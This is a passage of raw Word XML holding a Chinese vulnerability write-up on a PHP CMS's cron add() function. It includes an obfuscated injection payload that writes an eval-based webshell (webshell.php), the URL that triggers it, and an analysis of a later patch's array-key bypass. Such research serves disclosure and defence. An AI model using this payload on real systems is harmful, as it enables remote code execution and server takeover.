    <w:p w14:paraId="26EAB675" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="15665B8E" w14:textId="3F36E442" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r>
        <w:t>json编码和xss清洗后,写入WRITEPATH.'config/cron.php'文件中的内容为:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DF830E" w14:textId="77777777" w:rsidR="006940AB" w:rsidRDefault="006940AB" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7183512F" w14:textId="29DA8541" w:rsidR="006940AB" w:rsidRDefault="006940AB" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12D32125" w14:textId="442D5F09" w:rsidR="00F122AF" w:rsidRDefault="00927104" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1BA3A5B4" wp14:editId="552EC190">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="17" name="Picture 17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31A7" w14:textId="6415238D" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="6A9CA9C2" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>&lt;?php defined('FCPATH') OR exit('No direct script access allowed');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17296C5E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> $json='{"1":{"name":"","code":"[';file_put_contents('webshell.php',htmlspecialchars_decode('&amp;lt;').'?php eval'.base64_decode('KA==').'@$_POST['.base64_decode('Ig==').'password'.base64_decode('Ig==').']'.base64_decode('KQ==').';?'.htmlspecialchars_decode('&gt;'));return;']"}}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48088500" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="09E33362" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此</w:t>
      </w:r>
      <w:r>
        <w:t>post内容中的关键处为[';file_put_contents('webshell.php',htmlspecialchars_decode('&amp;lt;').'?php eval'.base64_decode('KA==').'@$_POST['.base64_decode('Ig==').'password'.base64_decode('Ig==').']'.base64_decode('KQ==').';?'.htmlspecialchars_decode('&amp;gt;'));return;']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C36FD08" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="14961239" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过</w:t>
      </w:r>
      <w:r>
        <w:t>json编码和xss清洗后,此处的内容变为:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C45C0FD" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7B099128" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>[';file_put_contents('webshell.php',htmlspecialchars_decode('&amp;lt;').'?php eval'.base64_decode('KA==').'@$_POST['.base64_decode('Ig==').'password'.base64_decode('Ig==').']'.base64_decode('KQ==').';?'.htmlspecialchars_decode('&gt;'));return;']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3912B746" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="1E0DC921" w14:textId="4F521F47" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>闭合了</w:t>
      </w:r>
      <w:r>
        <w:t>WRITEPATH.'config/cron.php'文件中'的包裹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9C285" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="4FD81F63" w14:textId="780EDEBA" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>### 包含写入的WRITEPATH.'config/cron.php'文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31390636" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="73B01902" w14:textId="006CB3F6" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过前面对</w:t>
      </w:r>
      <w:r>
        <w:t>add()函数的分析,调用add()函数时会首先在WRITEPATH.'config/cron.php'文件存在时包含WRITEPATH.'config/cron.php'文件,因此直接访问http://host:port/Admin.php?c=Cron&amp;m=add即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BC684C" w14:textId="3CC7F2ED" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="5DBF373A" w14:textId="5CC63A33" w:rsidR="00FF525F" w:rsidRDefault="00FF525F" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB392FD" w14:textId="421A9737" w:rsidR="00FF525F" w:rsidRDefault="00FF525F" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1127E69C" wp14:editId="6F7AE8FF">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="508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FAB1" w14:textId="77777777" w:rsidR="00FF525F" w:rsidRDefault="00FF525F" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67FA0E23" w14:textId="7BAD5E04" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>http://host:port/Admin.php?c=Cron&amp;m=add</w:t>
      </w:r>
      <w:r>
        <w:t>后,在网站根目录下会生成一个名为webshell.php的文件,文件内容为</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>&lt;?php eval(@$_POST[“password”]);?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFD4F72" w14:textId="59495FAB" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="6EE805A6" w14:textId="04A58062" w:rsidR="00FF525F" w:rsidRDefault="00FF525F" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>图片:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3AE267" w14:textId="2EEE7AD3" w:rsidR="00FF525F" w:rsidRDefault="00B5655A" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DEAC087" wp14:editId="61AC847D">
            <wp:extent cx="5274310" cy="2966720"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="18" name="Picture 18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C37E" w14:textId="77777777" w:rsidR="00FF525F" w:rsidRDefault="00FF525F" w:rsidP="00F122AF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DDB67C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>## 版本v4.5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12AE8672" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="4C687D42" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>add()函数的代码:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391D6299" w14:textId="6D5C79F6" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="375C4F4A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>// 任务类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5A9D33" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>public function add() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4DAD22" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="54F7B1B7" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    $json = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D699472" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    if (is_file(WRITEPATH.'config/cron.php')) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1670A086" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        require WRITEPATH.'config/cron.php';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CAF69D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A63DF3D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    $data = json_decode($json, true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64783140" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="72065B75" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    if (IS_AJAX_POST) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78EF9754" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="1A8D6D3A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $post = \Phpcmf\Service::L('input')-&gt;post('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA3F95A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        if ($post &amp;&amp; is_array($post)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A1BCC6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            foreach ($post as $key =&gt; $t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED3D1EB" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                if (!$t || !$t['name']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2903FA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                    unset($post[$key]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638A8554" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429DCED" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                $post[$key]['name'] = dr_safe_filename($t['name']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650D6223" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">                $post[$key]['code'] = dr_safe_filename($t['code']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D7AC416" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C164FE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        } else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4C5EC9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            $post = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDCF7E6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="371EF2D8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="39571C77" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        file_put_contents(WRITEPATH.'config/cron.php',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEBCC75" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            '&lt;?php defined(\'FCPATH\') OR exit(\'No direct script access allowed\');'.PHP_EOL.' $json=\''.json_encode($post).'\';');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0F8C6E" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="018B2F55" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        \Phpcmf\Service::L('input')-&gt;system_log('设置自定义任务类型');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A37B69" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="41C25971" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $this-&gt;_json(1, dr_lang('操作成功'));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EE1160" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631D7B18" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7D084525" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    \Phpcmf\Service::V()-&gt;assign([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41519F31" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        'data' =&gt; $data,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7354F34A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    ]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D064B95" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    \Phpcmf\Service::V()-&gt;display('cron_add.html');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC47F28" w14:textId="3347E9AD" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464EDFF2" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="17A2A97C" w14:textId="6F8A5EFC" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>版本</w:t>
      </w:r>
      <w:r>
        <w:t>v4.5.1相较之前的版本,在获取post的内容时,修改了如下的代码:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564CB23E" w14:textId="0FBFD545" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="6C72C832" w14:textId="2A6AD6DE" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>$post = \Phpcmf\Service::L('input')-&gt;post('data',true);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A770BFF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="5A085909" w14:textId="5FC1DD16" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4C8DF5" w14:textId="4D657821" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="79C05A54" w14:textId="2B4B780D" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>$post = \Phpcmf\Service::L('input')-&gt;post('data');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635633F6" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="7D14507C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>post()函数的第二个参数为是否进行xss清洗,因为post()函数第二个参数的默认值为`true`,所以这处改动理论上不造成任何影响</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F60A960" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0A4E72F6" w14:textId="087656B4" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同时</w:t>
      </w:r>
      <w:r>
        <w:t>,在获取post的内容后,进行</w:t>
      </w:r>
      <w:r w:rsidR="00A80226">
        <w:t>WRITEPATH.’config/cron.php’</w:t>
      </w:r>
      <w:r>
        <w:t>文件的写入前,增加了如下的代码:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DC84C8" w14:textId="48BE6F71" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="4BDEDDB9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>if ($post &amp;&amp; is_array($post)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FECDFB8" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    foreach ($post as $key =&gt; $t) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4F63B1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        if (!$t || !$t['name']) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B072F0" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">            unset($post[$key]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313641EC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098BC152" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $post[$key]['name'] = dr_safe_filename($t['name']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51841E4F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        $post[$key]['code'] = dr_safe_filename($t['code']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="548BAD64" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D87B65D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>} else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6BC9E1" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    $post = [];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042C8A25" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBC52E8" w14:textId="72F58F6A" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="42C5613A" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="292FCAD5" w14:textId="798567FA" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>上述代码先判断</w:t>
      </w:r>
      <w:r>
        <w:t>post的内容是否存在且为数组,不符合则将post的内容置为空数组,满足则</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>遍历post的内容,如果post的内容里某个键值对的value不存在或某个键值对的value的'name'key的value不存在,则销毁该键值对,然后将每个键值对的value的'name'key和'code'key通过dr_safe_filename()函数清洗,以下为dr_safe_filename()函数的代码:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380A98C" w14:textId="4CC619A4" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="29F5630F" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E61263" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> * 安全过滤文件及目录名称函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265C34EF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve"> */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A678DEA" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>function dr_safe_filename($string) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BC22B9" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    return str_replace(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198CEF72" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        ['..', "/", '\\', ' ', '&lt;', '&gt;', "{", '}', ';', ':', '[', ']', '\'', '"', '*', '?'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECAB2E4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513DC3CC" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">        (string)$string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="498D4353" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t xml:space="preserve">    );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5C954D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4503F35C" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="439BF0EE" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:t>### 绕过json编码,xss清洗,dr_safe_filename()函数的过滤和WRITEPATH.'config/cron.php'文件中'的包裹</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5076B280" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="74AAC2BF" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此处我们先不尝试绕过</w:t>
      </w:r>
      <w:r>
        <w:t>dr_safe_filename()函数,而是尝试另一个极其简单的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FE08F4" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="0DAA6451" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过对</w:t>
      </w:r>
      <w:r>
        <w:t>xss清洗函数的审计和版本v4.5.1add()函数新增加的代码的审计,可以发现对于数组的key没有任何过滤,包括多维数组的每一维度的key,所以此处可以通过修改post的内容中的key来写入我们想要的任意内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD72B93" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF"/>
    <w:p w14:paraId="45AF906D" w14:textId="77777777" w:rsidR="00F122AF" w:rsidRDefault="00F122AF" w:rsidP="00F122AF">
      <w:r>
        <w:rPr>
